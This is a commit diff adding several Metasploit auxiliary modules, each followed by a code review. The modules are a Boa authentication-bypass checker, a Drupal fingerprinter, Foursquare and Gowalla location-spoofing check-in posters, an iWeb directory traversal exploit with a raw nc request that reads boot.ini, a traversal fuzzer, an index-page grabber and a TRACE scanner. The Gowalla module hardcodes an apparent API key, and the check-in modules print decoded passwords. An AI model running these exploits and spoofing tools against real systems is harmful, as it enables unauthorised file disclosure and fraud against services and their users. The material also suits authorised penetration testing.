some old modules

commit a4a0287b038b313a1affc53cfb385bf7aa4e05f4 1 parent e5fe99a
@carnal0wnage authored
65 modules/auxiliary/admin/boa_authbypass.rb
@@ -0,0 +1,65 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ #include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Boa Authentication Bypass Exploit',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This module checks for your moms...',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.milw0rm.com/exploits/4542' ],
+ [ 'URL', 'http://www.securityfocus.com/archive/1/479434'],
+ ]
+ )
+
+end
+
+ def run
+
+
+ begin
+ res = send_request_raw({
+ 'version' => '1.1',
+ 'uri' => '/home/index.shtml',
+ 'method' => 'GET',
+ }, 10)
+
+ if (res and res.headers['Server'])
+ if res.headers['Server'] =~ /Boa/
+ print_status("#{datastore['RHOST']} is possibly vuln #{res.headers['Server']}\n Attempting to change password to blah:blah")
+ elsif
+ print_status("#{datastore['RHOST']} is not vuln #{res.headers['Server']}")
+ end
+
+ else
+ ''
+ end
+
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+ puts e.message
+ end
+ end
+#end
+
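Review bot: The `elsif` that follows the `/Boa/` banner match has no condition, so Ruby takes the next `print_status(...)` call as the condition; the "is not vuln" line still prints, but only as a side effect, and the branch body itself is empty — it should simply be `else`. The status message also announces "Attempting to change password to blah:blah", yet the module only reads the `Server` header and never sends the password-change request from the referenced advisory, so an operator will believe an action happened that did not; either implement that request or drop the wording (and replace the placeholder description 'This module checks for your moms...'). The first `rescue` swallows connection failures silently, so an unreachable host looks the same as a non-Boa one; and `puts e.message` in the second should be `print_error(e.message)` so the output goes through the framework's console.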
77 modules/auxiliary/admin/drupalcheck.rb
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ #include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Drupal Check',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This module check for the existence of the Drupal CMS by using the Expires: Sun, 19 Nov 1978 05:00:00 GMT header value. This should identify Drupal 4.6 and above. You MUST set the VHOST to be the domain name for this to work.',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.lullabot.com/articles/is-site-running-drupal' ],
+ ]
+ )
+
+ register_options(
+ [
+ OptString.new('UserAgent', [true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
+ OptString.new('VHOST', [true, "The VHOST -- Must set for this module", 'www.google.com' ])
+ ], self.class)
+end
+
+ def run
+
+
+ begin
+ agent = datastore['UserAgent']
+ res = send_request_raw({
+ 'version' => '1.0',
+ 'uri' => '/',
+ 'method' => 'GET',
+ 'headers' =>
+ {
+ 'Accept' => '*/*',
+ 'Connection' => 'Keep-Alive',
+ }
+
+ }, 10)
+
+ if (res and res.headers['Expires'])
+ if res.headers['Expires'] =~ /Sun, 19 Nov 1978 05:00:00 GMT/
+ print_status("#{datastore['RHOST']} is running Drupal CMS\nServer response #{res.headers['Expires']}")
+ elsif
+ print_status("#{datastore['RHOST']} is not running Drupal CMS\nServer response #{res.headers['Expires']}")
+ end
+
+
+ else
+ ''
+ end
+
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue Timeout::Error, Errno::EINVAL, Errno::ECONNRESET, EOFError, Errno::ECONNABORTED, Errno::ECONNREFUSED, Errno::EHOSTUNREACH =>e
+ puts e.message
+ end
+ end
+#end
+
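Review bot: The `elsif` under the `Expires` comparison has no condition, so the following `print_status(...)` call is parsed as the condition; the "is not running Drupal" message still prints, but only by accident, and the branch body is empty — change it to `else`. When the header is absent altogether the outer `else` evaluates `''` and prints nothing, so a silent run is indistinguishable from a verdict; add `print_status("#{datastore['RHOST']} sent no Expires header - inconclusive")` there. The fixed 1978 `Expires` value is a heuristic that caches and reverse proxies routinely rewrite or strip, so a miss should be reported as inconclusive rather than as "not running Drupal". The required `VHOST` option defaults to `www.google.com`, which is sent verbatim as the `Host:` header unless the operator remembers to change it; leaving it required with no default forces the right value.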
75 modules/auxiliary/admin/foursquare.rb
@@ -0,0 +1,75 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Foursquare Location Poster',
+ 'Version' => '$Revision:$',
+ 'Description' => 'Fuck with Foursquare, be anywhere you want to be by venue id',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+ [ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+ ]
+ )
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+ register_options(
+ [
+ Opt::RHOST('api.foursquare.com'),
+ OptString.new('VENUEID', [ true, 'foursquare venueid', '185675']), #Louve Paris France
+ OptString.new('USERNAME', [ true, 'foursquare username', 'username']),
+ OptString.new('PASSWORD', [ true, 'foursquare password', 'password']),
+ ], self.class)
+
+ end
+
+ def run
+
+ begin
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ venid = datastore['VENUEID']
+ user_pass = Rex::Text.encode_base64(user + ":" + pass)
+ decode = Rex::Text.decode_base64(user_pass)
+ postrequest = "twitter=1\n" #add facebook=1 if you want facebook
+
+ print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+ print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+ res = send_request_cgi({
+ 'uri' => "/v1/checkin?vid=#{venid}",
+ 'version' => "1.1",
+ 'method' => 'POST',
+ 'data' => postrequest,
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{user_pass}",
+ 'Proxy-Connection' => "Keep-Alive",
+ }
+ }, 25)
+
+ print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE =>e
+ puts e.message
+ end
+end
+
+
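Review bot: The two `#debug` lines echo the Base64-encoded and then decoded `user:pass` to the console, and therefore to any msfconsole spool or log, which is a needless credential leak; remove them, or at least the decoded one. The request carries HTTP Basic credentials to `api.foursquare.com` but the module sets no `SSL` default, so unless the operator enables it the password crosses the wire in cleartext (assuming the HttpClient mixin defaults to plain HTTP on port 80, which this diff does not show); `'DefaultOptions' => { 'SSL' => true }` plus `Opt::RPORT(443)` would close that. `res` is `nil` on a timeout, in which case the final `print_status` prints an empty line; `print_error("No response from #{rhost}") unless res` makes the failure visible. `Proxy-Connection` is a proxy hop-by-hop header and has no effect when talking to the origin directly.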
89 modules/auxiliary/admin/gowalla.rb
@@ -0,0 +1,89 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Gowalla Location Poster',
+ 'Version' => '$Revision:$',
+ 'Description' => 'Fuck with Gowalla, be anywhere you want to be by spot id',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://groups.google.com/group/foursquare-api' ],
+ [ 'URL', 'http://www.mikekey.com/im-a-foursquare-cheater/'],
+ ]
+ )
+#todo pass in geocoords instead of venueid, create a venueid, other tom foolery
+ register_options(
+ [
+ Opt::RHOST('api.gowalla.com'),
+ OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android, 0.9.1, 320x480)']),
+ #OptString.new('UserAgent', [true, "Specify Gowalla UserAgent",'Gowalla/1.1 (unknown, Android, 4, android-devphone1/Android Dev Phone 1, 0.9.1-73-g59c95ca, 320x480)']),
+ OptString.new('SPOTID', [ true, 'gowalla spot id', '14515']), #Facebook HQ
+ OptString.new('USERNAME', [ true, 'gowalla username', 'username']),
+ OptString.new('PASSWORD', [ true, 'gowalla password', 'password']),
+ OptString.new('GPSLONGITUDE', [ true, 'GPS Longitude', '-122.1525514126']),
+ OptString.new('GPSLATITUDE', [ true, 'GPS Latitude', '37.4157602871']),
+ OptString.new('GOWALLAAPIKEY', [ true, 'gowalla API Key', '4a35a8b7df6a405a816b01cd5b44b95d']),
+ OptString.new('COMMENT', [ true, 'Comment', 'fooooood']),
+ ], self.class)
+
+ end
+
+ def run
+
+ begin
+ user = datastore['USERNAME']
+ pass = datastore['PASSWORD']
+ spotid = datastore['SPOTID']
+ lng = datastore['GPSLONGITUDE']
+ lat = datastore['GPSLATITUDE']
+ api = datastore['GOWALLAAPIKEY']
+ comment = datastore['COMMENT']
+
+ user_pass = Rex::Text.encode_base64(user + ":" + pass)
+ decode = Rex::Text.decode_base64(user_pass)
+ postrequest = "lng=#{lng}&accuracy=0.0&post_to_facebook=0&post_to_twitter=1&comment=#{comment}&lat=#{lat}\n"
+
+ print_status("Base64 Encoded User/Pass: #{user_pass}") #debug
+ print_status("Base64 Decoded User/Pass: #{decode}") #debug
+
+ res = send_request_cgi({
+ 'uri' => "/checkins?spot_id=#{spotid}",
+ 'version' => "1.1",
+ 'method' => 'POST',
+ 'data' => postrequest,
+ 'headers' =>
+ {
+ 'Authorization' => "Basic #{user_pass}",
+ 'X-Gowalla-API-Version' => "1",
+ 'Accept' => 'application/json',
+ 'Proxy-Connection' => "Keep-Alive",
+ 'X-Gowalla-API-Key' => "#{api}"
+ }
+ }, 25)
+
+ print_status("#{res}") #this outputs entire response, could probably do without this but its nice to see whats going on
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE =>e
+ puts e.message
+ end
+end
+
+
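Review bot: `comment`, `lat` and `lng` are interpolated into the form body without encoding, so a comment containing `&` or `=` splits into extra fields the server will interpret; build it with `comment=#{Rex::Text.uri_encode(comment)}` (and likewise for the coordinates). The `GOWALLAAPIKEY` default bakes what looks like a live API key into the module source; keys committed this way get scraped and revoked, so make it a required option with no default. As in the Foursquare module, the two `#debug` lines print the decoded `user:pass` to the console and should go. The `References` entries still point at the Foursquare API group and cheater write-up, a copy-paste left over from that module.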
77 modules/auxiliary/admin/iweb_dir_traversal.rb
@@ -0,0 +1,77 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'iWeb HTTP Server Directory Transversal Vulnerability',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This modules exploits the iWeb HTTP Server Directory Transversal Vulnerability',
+ # some webcam shit has a similar Server Header see below for actual server header.
+ # default install path C:\Progam Files\Ashley Brown\iWeb\
+ 'Author' => 'CG' ,
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://packetstormsecurity.org/0912-exploits/iweb-traversal.txt' ],
+ [ 'BID', '37228' ],
+ [ 'URL', 'http://www.ashleybrown.co.uk/iweb/' ],
+ [ 'URL', 'http://www.exploit-db.com/exploits/10331' ]
+ ]
+ )
+ register_options(
+ [
+ OptString.new('FILE', [ true, "The file to view", 'boot.ini']),
+ OptString.new('TRAV', [ true, "Traversal Depth", '..%5C..%5C..%5C']),
+ ], self.class)
+ end
+
+ def run
+
+ begin
+ file = datastore['FILE']
+ trav = datastore['TRAV']
+ res = send_request_raw({
+ 'uri' => '/'+trav+file,
+ 'method' => 'GET'
+ }, 10)
+
+ if (res and res.code == 200)
+ print_status("Output Of Requested File:\n#{res.body}")
+ else
+ print_status("Received #{res.code} for #{trav}#{file}")
+ end
+
+ #rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ #rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+
+end
+
+# nc 172.16.10.132 80
+# GET ..%5C..%5C..%5Cboot.ini HTTP/1.0
+
+# HTTP/1.1 200 OK
+# LastModified: 12/22/2005 3:22:59 PM
+# Server: iWeb
+# Content-Length: 210
+
+# [boot loader]
+# timeout=30
+# default=multi(0)disk(0)rdisk(0)partition(1)\WINDOWS
+# [operating systems]
+# multi(0)disk(0)rdisk(0)partition(1)\WINDOWS="Windows Server 2003, Enterprise" /noexecute=optout /fastdetect
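Review bot: `res` is `nil` when `send_request_raw` times out or the target drops the connection, and the `else` branch then calls `res.code`, raising `NoMethodError`; with both `rescue` lines commented out nothing catches it, so the `begin`/`end` is dead scaffolding. Change the branch to `elsif res` with the existing `print_status`, add `else print_error("No response from #{rhost}")`, and restore the connection-error rescues. A 200 by itself does not prove the traversal worked, since some servers answer 200 with an error page; checking the body for expected content before printing (for the default `boot.ini`, `res.body =~ /\[boot loader\]/`) would cut false positives. Also "Transversal" in the name and description should be "Traversal".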
66 modules/auxiliary/admin/traversal_fuzz.rb
@@ -0,0 +1,66 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'Directory Transversal Fuzzer',
+ 'Version' => '$Revision: $',
+ 'Description' => 'This modules is a directory traversal fuzzer',
+
+ 'Author' => 'CG' ,
+ 'License' => MSF_LICENSE,
+ 'References' =>
+ [
+ [ 'URL', 'http://www.owasp.org/index.php/Fuzzing' ],
+ ]
+ )
+ register_options(
+ [
+ OptString.new('PATH', [ true, "URI Path", '/']),
+ OptString.new('FILE', [ true, "The file to view", 'boot.ini']),
+ OptString.new('FUZZFILE', [ false, 'The file that contains a list of fuzz strings.', File.join(Msf::Config.install_root, 'data', 'wordlists', 'dir_traversal_strings.txt')]),
+ ], self.class)
+ end
+
+ def run
+
+ begin
+ file = datastore['FILE']
+ path = datastore['PATH']
+
+ File.open(datastore['FUZZFILE']).each_line do |fuzztrav|
+
+ string = fuzztrav.strip+datastore['FILE']
+
+ res = send_request_raw({
+ 'uri' => path+string,
+ 'method' => 'GET'
+ }, 10)
+
+ if (res and res.code == 200)
+ print_status("#{string}")
+ print_status("Output Of Requested File:\n#{res.body}")
+ else
+ print_error("Received #{res.code} for #{string}")
+ end
+ end
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+
+end
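Review bot: `res` is `nil` on a timeout or reset, and the `else` branch then dereferences `res.code`, aborting the whole fuzz run with `NoMethodError`; guard it with `elsif res` and print a "no response" error otherwise. `File.open(datastore['FUZZFILE']).each_line` never closes the handle — `File.foreach(datastore['FUZZFILE']) do |fuzztrav|` does the same work without the leak. The `rescue` clauses sit outside the loop, so a single `ConnectionTimeout` ends the run instead of skipping to the next payload; moving the request and its rescue inside the block keeps the fuzzer going across flaky targets. The local `file` is assigned but never used (the block reads `datastore['FILE']` directly).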
130 modules/auxiliary/scanner/http_index_grabber.rb
@@ -0,0 +1,130 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/projects/Framework/
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Auxiliary
+
+ include Msf::Exploit::Remote::HttpClient
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'HTTP Index Page grabber',
+ 'Version' => '$Revision:$',
+ 'Description' => %q{
+ Scans a range and grabs the content of a GET request and outputs it to file.
+ },
+ 'References' =>
+ [
+ [ 'URL', 'http://carnal0wnage.attackresearch.com' ],
+ ],
+ 'Author' => [ 'CG' ],
+ 'License' => MSF_LICENSE
+ )
+
+ register_options(
+ [
+ Opt::RPORT(80),
+ OptString.new('URL', [ true, "URI Path", '/']),
+ OptString.new('UserAgent', [ true, "The HTTP User-Agent sent in the request", 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)' ]),
+ ], self.class)
+ end
+
+ def run_host(ip)
+
+ url = datastore['URL']
+ host = ip
+
+ # Create Filename info to be appended to downloaded files
+ filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
+
+ # Create a directory for the logs
+ logs = ::File.join(Msf::Config.log_directory, 'auxiliary', 'http_index_grabber')
+
+ # Create the log directory
+ ::FileUtils.mkdir_p(logs)
+
+ #logfile name
+ logfile = logs + ::File::Separator + host + filenameinfo + ".html"
+
+ res = send_request_raw({
+ 'uri' => url,
+ 'method' => 'GET',
+ 'versions' => '1.0',
+ }, 15)
+
+ if (res.nil?)
+ print_error("no response for #{ip}:#{rport} #{url}")
+
+ elsif (res.code == 200)
+
+ extra = http_fingerprint(res)
+
+ print_good("Received a HTTP 200 with #{res.headers['Content-Length']} bytes....Logging to file: #{logfile}")
+ #print_good("Extras: #{extra}")
+ exists = File.new(logfile,"a")
+ exists.write "#{res.body}"
+ exists.close
+ if (extra.nil?)
+ return ''
+ else
+ print_good("Extras: #{extra}")
+ end
+ elsif (res.code == 302 or res.code == 301)
+ print_status("Received #{res.code} to #{res.headers['Location']} for #{ip}:#{rport}#{url}")
+ else
+ #''
+ print_error("Received #{res.code} for #{ip}:#{rport}#{url}")
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout, ::ArgumentError
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+
+ def http_fingerprint(res)
+ return if not res
+
+ extras = []
+
+ case res.body
+ when nil
+ # Nothing
+ when /openAboutWindow.*\>DD\-WRT ([^\<]+)\</
+ extras << "DD-WRT #{$1.strip}"
+ when /It works!/i
+ extras << "Apache Default 'It Works!' Page"
+ when /Microsoft Outlook Web Access/
+ extras << "Microsoft OWA Login Page"
+ when /Microsoft Office Outlook Web Access/
+ extras << "Microsoft OWA Login Page"
+ when /The site you are trying to view does not currently have a default page/
+ extras << "Microsoft Default Under Construction Page"
+ when /Under Construction/i
+ extras << "Microsoft Default Under Construction Page"
+ when /Cisco CallManager User Options Log On/i
+ extras << "Cisco Call Manger Login"
+ when /ID_ESX_Welcome/
+ extras << "VMware ESX Server"
+ when /Test Page for.*Fedora/
+ extras << "Fedora Default Page"
+ when /Placeholder page/
+ extras << "Debian Default Page"
+ when /Welcome to Windows Small Business Server (\d+)/
+ extras << "Windows SBS #{$1}"
+ when /Asterisk@Home/
+ extras << "Asterisk"
+ when /swfs\/Shell\.html/
+ extras << "BPS-1000"
+ when /axis .* network Camera/i
+ extras << "Axis Network Camera Web Interface"
+ when /Novell ZENworks Control Center/i
+ extras << "Novell ZENworks Control Center Login"
+ end
+ end
+end
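Review bot: The request hash uses the key `'versions'` instead of `'version'`, so the intended HTTP/1.0 is silently ignored and the mixin's default version is sent; fix the key. The response body is written unmodified to a `.html` file under the log directory, which means an operator who later opens that log in a browser will render and run whatever script the scanned host returned — write it as `.txt`, or at least add `# NOTE: body is untrusted target content; do not open the log in a browser` above the write. `res.headers['Content-Length']` is absent on chunked responses, so the `print_good` line can read "with  bytes"; `res.body.length` is the reliable figure. `http_fingerprint` returns `extras` only when a `when` matches and `nil` otherwise because the `case` is the method's last expression; ending it with an explicit `extras` and testing `extra.empty?` in the caller is clearer.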
80 modules/auxiliary/scanner/trace.rb
@@ -0,0 +1,80 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# Framework web site for more information on licensing and terms of use.
+# http://metasploit.com/framework/
+##
+
+
+require 'msf/core'
+
+
+class Metasploit3 < Msf::Auxiliary
+
+ # Exploit mixins should be called first
+ include Msf::Exploit::Remote::HttpClient
+ #include Msf::Auxiliary::WMAPScanServer
+ # Scanner mixin should be near last
+ include Msf::Auxiliary::Scanner
+ include Msf::Auxiliary::Report
+
+ def initialize
+ super(
+ 'Name' => 'HTTP TRACE Detection',
+ 'Version' => '$Revision:use$',
+ 'Description' => 'Test TRACE Methods',
+ 'Author' => ['CG'],
+ 'License' => MSF_LICENSE
+ )
+
+ end
+
+ def run_host(target_host)
+
+ begin
+ res = send_request_raw({
+ 'version' => '1.0',
+ 'uri' => '/',
+ 'method' => 'TRACE'
+ }, 10)
+
+
+ if (res and res.code >= 200)
+ statuscode = res.code
+ #print statuscode #debug
+ response = case res.code
+ when 200 then "TRACE is **probably** enabled -- We received a 200 Response"
+ when 301 then "Site is responding with a 301 - Redirect for \"/\""
+ when 302 then "Site is responding with a 302 - Redirect for \"/\""
+ when 403 then "TRACE is disabled. 403 Forbidden"
+ when 404 then "TRACE is probably disabled. 404 Not Found"
+ when 405 then "TRACE is disabled. 405 Method Not Allowed Response"
+ when 500 then "TRACE is probably disabled. 500 Method Not Allowed Response"
+ when 501 then "TRACE is disabled. 501 Not Implemented Response"
+ else "Unexpected Response."
+ end
+ else
+ ''
+ end
+
+ print_status("#{response} for #{target_host}")
+
+
+
+ report_note(
+ :host => target_host,
+ :proto => 'HTTP',
+ :port => rport,
+ :type => 'TRACE Response Code',
+ :data => "#{response} for #{target_host}"
+ )
+
+
+ end
+
+ rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
+ rescue ::Timeout::Error, ::Errno::EPIPE
+ end
+ end
+#end
+
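Review bot: When `res` is `nil` the `else` branch only evaluates `''`, so `response` stays `nil` and the module prints ` for host` and files an empty `report_note`; add `return unless res` right after the request. A bare 200 is weak evidence that TRACE is enabled, because many servers treat unknown methods as GET and return the index page; a real TRACE reflects the request line, so confirm with `res.body =~ /^TRACE \/ HTTP/` before reporting it enabled and downgrade a non-reflecting 200 to "inconclusive". The 500 message reads "Method Not Allowed", which is the 405 text; "Internal Server Error" is what 500 means. The `'Version' => '$Revision:use$'` field looks like a mangled keyword and should be the usual `'$Revision: $'`.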